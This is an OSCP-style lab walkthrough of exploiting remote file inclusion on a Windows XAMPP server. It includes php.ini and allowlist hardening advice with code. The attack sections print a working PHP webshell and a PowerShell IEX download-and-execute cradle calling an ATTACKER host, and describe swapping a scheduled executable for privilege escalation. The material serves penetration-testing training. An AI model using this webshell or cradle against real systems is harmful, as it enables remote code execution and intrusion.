OSCP Practice RFI + PHP to RCE
High Level Summary
During review of this device, ports 4443 and 8080 were found to be running an Apache web server; both served the default XAMPP dashboard. Fuzzing for other files and directories led to the discovery of a /site directory. From the structure of the URL, it looked like the page should be tested for LFI / RFI.
Using the Windows hosts file (C:\Windows\System32\drivers\etc\hosts), we were able to verify that local files could be read. With a nc listener, we were able to verify that remote files could be included: a request for a URL on our host produced a connection to the listener.
Once we knew that remote files could be included, we tested command execution with a PHP webshell. The webshell was then used to launch a PowerShell IEX cradle, which gave us a callback from the host.
Once on the system, we identified an executable in the C:\Backup directory that was run on a schedule. Our user had write access to this file, and we replaced it with our own executable to get a callback as an administrative-level user.
Recommendations
Disable inclusion of remote files in the PHP configuration: set allow_url_include to Off in php.ini, and set allow_url_fopen to Off as well unless the application genuinely needs to open remote URLs with fopen() and friends. allow_url_include defaults to Off, so a host that is exploitable by RFI has had it turned on explicitly.
Additionally, use a framework for PHP development, or at a minimum never pass user input directly to include or require. A framework's routing normally maps the request to one file from a fixed set, so only the file actually needed is loaded.
Finally, low-privilege users should not have write permissions on an executable that is run on a timer as an administrative user.
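The two recommendations above side by side, as an added example that is not code from the original write-up: the unsafe include pattern behind a /site-style RFI, the allowlisted replacement a framework router would normally give you, and the matching php.ini directives. The "page" parameter, the pages/ directory and the page names are assumptions.

```php
<?php
// Added example, not code from the original write-up. The "page" parameter
// and the pages/ directory are assumptions chosen to mirror the kind of
// include behind the /site RFI described above.
//
// php.ini side of the recommendation (PHP's own default for
// allow_url_include is Off, so an RFI-able host has had it switched on):
//   allow_url_fopen   = Off   ; unless the app really needs fopen() on URLs
//   allow_url_include = Off   ; never include()/require() from a URL

// --- Vulnerable: the client chooses the file ------------------------------
// With allow_url_include=On, ?page=http://ATTACKER/shell.txt is fetched and
// executed (RFI). Even with it Off, ?page=..\..\Windows\System32\drivers\etc\hosts
// is read and, having no <?php tag, echoed straight back (LFI).
function vulnerable_include(string $page): void
{
    include $page;
}

// --- Hardened: the client chooses a key, the server chooses the file ------
// Only names present in the allowlist are ever resolved, so the request
// value is never used as a path and neither traversal nor a URL reaches
// include(). Unknown keys fall back to the home page.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): string
{
    $key = (is_string($requested) && array_key_exists($requested, PAGES))
        ? $requested
        : 'home';
    return __DIR__ . DIRECTORY_SEPARATOR . 'pages' . DIRECTORY_SEPARATOR . PAGES[$key];
}

function safe_include($requested): void
{
    $path = resolve_page($requested);

    // Defence in depth: realpath() canonicalises the path (resolving ".."
    // and symlinks) and returns false for stream wrappers such as http://
    // or php://, which have no filesystem path. The result must still sit
    // inside the pages directory before it is included.
    $real = realpath($path);
    $base = realpath(__DIR__ . DIRECTORY_SEPARATOR . 'pages');
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        return;
    }
    include $real;
}

safe_include($_GET['page'] ?? null);
```

The allowlist alone closes the hole; the realpath() check is there so that a later edit which starts building the path from request data again still cannot escape the pages directory or pull in a URL.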
Initial Access with the RFI
After fuzzing the web server, we found the /site directory. It looked like this when it loaded.
This was a Windows machine, so we used Burp to test for LFI with the hosts file (C:\Windows\System32\drivers\etc\hosts), which exists on every Windows install and is readable by any user.
After confirming that the page was vulnerable to LFI, a nc listener was used to verify whether a URL could be included: pointing the parameter at a URL on our host produced a connection to the listener.
RCE with a WebShell
Using Python's built-in web server, a PHP webshell was hosted, included through the RFI, and command execution was verified.
Next, the RCE was used to launch a reverse shell with a simple PowerShell IEX cradle.
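A minimal PHP webshell of the kind used in the two steps above, as an added example (not the file from the original engagement). The `cmd` parameter name, the `page` parameter, the TARGET and ATTACKER hosts, and the rev.ps1 script name are all assumptions.

```php
<?php
// Added example web shell; not the file used in the original write-up.
// Hosted on the attacker box with Python's built-in server
// (python3 -m http.server 80) and pulled in through the RFI, e.g.
//   http://TARGET:8080/site/?page=http://ATTACKER/shell.txt&cmd=whoami
// (TARGET, ATTACKER, the "page" parameter and the file name are assumptions).
// The target's include() evaluates the fetched text as PHP, so the remote
// copy can carry any extension; query parameters on the same request are
// visible to the included code through $_REQUEST.

if (!isset($_REQUEST['cmd']) || !is_string($_REQUEST['cmd'])) {
    exit;
}
$cmd = $_REQUEST['cmd'] . ' 2>&1'; // merge stderr so failures are visible

// php.ini can disable individual exec functions (disable_functions),
// so try the common ones in turn instead of relying on one.
$out = '';
$ran = false;
if (function_exists('shell_exec')) {
    $out = (string) shell_exec($cmd);
    $ran = true;
} elseif (function_exists('exec')) {
    exec($cmd, $lines);
    $out = implode("\n", $lines);
    $ran = true;
} elseif (function_exists('passthru')) {
    ob_start();
    passthru($cmd);
    $out = (string) ob_get_clean();
    $ran = true;
} elseif (function_exists('proc_open')) {
    $p = proc_open($cmd, [1 => ['pipe', 'w']], $pipes);
    if (is_resource($p)) {
        $out = (string) stream_get_contents($pipes[1]);
        fclose($pipes[1]);
        proc_close($p);
        $ran = true;
    }
}

if (!$ran) {
    echo '<pre>no usable exec function</pre>';
} else {
    echo '<pre>' . htmlspecialchars($out, ENT_QUOTES) . '</pre>';
}

// To get the reverse shell described above, the value of cmd is a PowerShell
// IEX cradle (URL-encoded before it goes into the query string). rev.ps1 is an
// assumed name for the reverse-shell script served from the same Python
// web server:
//   powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/rev.ps1')"
```

Serving the shell as .txt is deliberate: nothing on the attacker side tries to execute it, and the victim's include() does not care about the extension of a remote file.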
Once we had an interactive shell, we identified a Backup directory containing multiple files. Reading their contents showed that the backup was being run on a schedule.
Our user had write permissions on the executable, so we renamed the original and replaced it with a malicious executable that called back to our system the next time the scheduled job ran.